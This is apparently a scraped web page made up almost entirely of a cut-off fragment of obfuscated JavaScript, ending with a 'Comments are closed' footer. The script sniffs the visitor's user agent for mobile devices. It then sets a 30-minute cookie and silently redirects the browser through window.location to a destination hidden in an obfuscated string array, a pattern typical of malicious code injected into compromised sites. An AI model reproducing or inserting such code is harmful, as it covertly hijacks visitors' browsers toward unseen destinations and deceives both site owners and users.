-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Comments are closed.